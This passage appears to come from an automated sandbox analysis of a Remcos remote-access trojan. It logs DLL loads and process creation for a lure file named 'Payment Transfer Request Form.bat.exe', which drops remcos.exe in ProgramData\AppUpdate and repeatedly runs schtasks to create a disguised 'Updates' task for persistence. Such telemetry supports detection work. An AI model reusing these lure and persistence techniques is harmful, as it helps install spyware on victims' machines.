              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCD42.tmp"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpED6C.tmp"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCDB.tmp"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: mscoree.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: apphelp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: version.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wldp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: profapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: dwrite.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: amsi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: userenv.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: msasn1.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: gpapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windowscodecs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: propsys.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: edputil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: appresolver.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: bcp47langs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: slc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: sppc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
